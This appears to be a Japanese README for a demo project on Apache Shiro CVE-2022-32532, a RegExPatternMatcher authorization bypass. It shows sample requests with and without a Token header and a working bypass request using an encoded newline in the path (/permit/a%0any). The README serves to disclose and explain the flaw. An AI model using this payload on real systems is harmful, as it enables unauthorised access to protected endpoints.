
Apache Shiro CVE-2022-32532
これはデモプロジェクトであり、この脆弱性(CVE-2022-32532)を悪用するための条件の1つを示すものにすぎません。
実際には、もっと多くの悪用方法があります。開発者が RegExPatternMatcher を使用する限り、バイパスの脆弱性が発生する可能性があります。
現在の構成では、トークンリクエストヘッダーの検証が必要です。そうでない場合、/permit 配下のインターフェースにアクセスする権限がありません。
このリクエストは成功します
GET /permit/any HTTP/1.1
Token: 4ra1n
トークンリクエストヘッダーがない場合、アクセスは許可されません
GET /permit/any HTTP/1.1
特別だが一般的な構成では、簡単な方法でバイパスできます
GET /permit/a%0any HTTP/1.1
https://lists.apache.org/thread/y8260dw8vbm99oq7zv6y3mzn5ovk90xh
この脆弱性はSpring-SecurityのCVE-2022-22978に似ています